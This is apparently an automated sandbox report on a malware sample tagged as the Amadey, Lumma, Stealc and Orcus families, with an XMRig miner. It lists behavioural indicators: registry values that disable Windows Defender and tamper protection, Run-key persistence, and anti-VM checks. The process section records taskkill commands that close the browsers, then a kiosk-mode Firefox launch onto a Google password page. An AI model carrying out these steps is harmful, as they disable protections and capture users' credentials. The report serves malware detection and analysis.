Malware Analysis Report

2025-01-22 14:52

Sample ID 241206-ds7kaatmbq
Target ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe
SHA256 ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4
Tags
amadey gcleaner lumma stealc 9c9aa5 drum discovery evasion loader persistence stealer trojan orcus ta505 xmrig execution miner rat spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4

Threat Level: Known bad

The file ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe was found to be: Known bad.

Malicious Activity Summary

amadey gcleaner lumma stealc 9c9aa5 drum discovery evasion loader persistence stealer trojan orcus ta505 xmrig execution miner rat spyware

Xmrig family

Orcus family

Lumma family

xmrig

Amadey

XMRig Miner payload

TA505

Orcus

Suspicious use of NtCreateUserProcessOtherParentProcess

Lumma Stealer, LummaC

Gcleaner family

Modifies Windows Defender Real-time Protection settings

Stealc

GCleaner

Stealc family

Ta505 family

Amadey family

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Orcurs Rat Executable

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Checks computer location settings

Loads dropped DLL

Windows security modification

Executes dropped EXE

Checks BIOS information in registry

Identifies Wine through registry keys

Adds Run key to start application

Looks up external IP address via web service

AutoIT Executable

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates processes with tasklist

Drops file in Windows directory

Unsigned PE

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Kills process with taskkill

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Runs net.exe

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Scheduled Task/Job: Scheduled Task

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-06 03:17

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-06 03:17

Reported

2024-12-06 03:19

Platform

win7-20240903-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe N/A

Stealc

stealer stealc

Stealc family

stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012590001\ac08ad066b.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012591001\f3faf6e172.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012589001\3b61988b61.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012590001\ac08ad066b.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012591001\f3faf6e172.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012589001\3b61988b61.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012589001\3b61988b61.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012590001\ac08ad066b.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012591001\f3faf6e172.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012589001\3b61988b61.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012590001\ac08ad066b.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012591001\f3faf6e172.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\ac08ad066b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012590001\\ac08ad066b.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\f3faf6e172.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012591001\\f3faf6e172.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\53cf2003b2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012592001\\53cf2003b2.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\6f0a087fd3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012593001\\6f0a087fd3.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\skotes.job C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012591001\f3faf6e172.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012589001\3b61988b61.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012590001\ac08ad066b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3020 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 3020 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 3020 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 3020 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2808 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012589001\3b61988b61.exe
PID 2808 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012589001\3b61988b61.exe
PID 2808 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012589001\3b61988b61.exe
PID 2808 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012589001\3b61988b61.exe
PID 2808 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012590001\ac08ad066b.exe
PID 2808 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012590001\ac08ad066b.exe
PID 2808 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012590001\ac08ad066b.exe
PID 2808 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012590001\ac08ad066b.exe
PID 2808 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012591001\f3faf6e172.exe
PID 2808 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012591001\f3faf6e172.exe
PID 2808 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012591001\f3faf6e172.exe
PID 2808 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012591001\f3faf6e172.exe
PID 2808 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe
PID 2808 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe
PID 2808 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe
PID 2808 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe
PID 1976 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe C:\Windows\SysWOW64\taskkill.exe
PID 1976 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe C:\Windows\SysWOW64\taskkill.exe
PID 1976 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe C:\Windows\SysWOW64\taskkill.exe
PID 1976 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe C:\Windows\SysWOW64\taskkill.exe
PID 1976 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe C:\Windows\SysWOW64\taskkill.exe
PID 1976 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe C:\Windows\SysWOW64\taskkill.exe
PID 1976 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe C:\Windows\SysWOW64\taskkill.exe
PID 1976 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe C:\Windows\SysWOW64\taskkill.exe
PID 1976 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe C:\Windows\SysWOW64\taskkill.exe
PID 1976 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe C:\Windows\SysWOW64\taskkill.exe
PID 1976 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe C:\Windows\SysWOW64\taskkill.exe
PID 1976 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe C:\Windows\SysWOW64\taskkill.exe
PID 1976 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe C:\Windows\SysWOW64\taskkill.exe
PID 1976 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe C:\Windows\SysWOW64\taskkill.exe
PID 1976 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe C:\Windows\SysWOW64\taskkill.exe
PID 1976 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe C:\Windows\SysWOW64\taskkill.exe
PID 1976 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe C:\Windows\SysWOW64\taskkill.exe
PID 1976 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe C:\Windows\SysWOW64\taskkill.exe
PID 1976 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe C:\Windows\SysWOW64\taskkill.exe
PID 1976 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe C:\Windows\SysWOW64\taskkill.exe
PID 1976 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1976 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1976 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1976 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2772 wrote to memory of 2320 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2772 wrote to memory of 2320 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2772 wrote to memory of 2320 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2772 wrote to memory of 2320 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2772 wrote to memory of 2320 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2772 wrote to memory of 2320 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2772 wrote to memory of 2320 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2772 wrote to memory of 2320 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2772 wrote to memory of 2320 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2772 wrote to memory of 2320 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2772 wrote to memory of 2320 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2772 wrote to memory of 2320 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2320 wrote to memory of 2268 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2320 wrote to memory of 2268 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2320 wrote to memory of 2268 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2808 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe
PID 2808 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe
PID 2808 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe
PID 2808 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe
PID 2320 wrote to memory of 900 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe

"C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\1012589001\3b61988b61.exe

"C:\Users\Admin\AppData\Local\Temp\1012589001\3b61988b61.exe"

C:\Users\Admin\AppData\Local\Temp\1012590001\ac08ad066b.exe

"C:\Users\Admin\AppData\Local\Temp\1012590001\ac08ad066b.exe"

C:\Users\Admin\AppData\Local\Temp\1012591001\f3faf6e172.exe

"C:\Users\Admin\AppData\Local\Temp\1012591001\f3faf6e172.exe"

C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe

"C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2320.0.1717898442\979513787" -parentBuildID 20221007134813 -prefsHandle 1240 -prefMapHandle 1232 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {765321ea-8755-446d-abb5-b74f7632dc13} 2320 "\\.\pipe\gecko-crash-server-pipe.2320" 1304 120f5658 gpu

C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe

"C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2320.1.787943249\1778487959" -parentBuildID 20221007134813 -prefsHandle 1492 -prefMapHandle 1488 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e942b38f-e386-4267-951d-bd63f1a46051} 2320 "\\.\pipe\gecko-crash-server-pipe.2320" 1520 d72158 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2320.2.1105286659\735900395" -childID 1 -isForBrowser -prefsHandle 1832 -prefMapHandle 1892 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 844 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6844f706-8ff9-4ac3-b56d-8fb53b74faa4} 2320 "\\.\pipe\gecko-crash-server-pipe.2320" 1868 1a7bc958 tab

C:\Program Files\Mozilla Firefox\firefox.exe

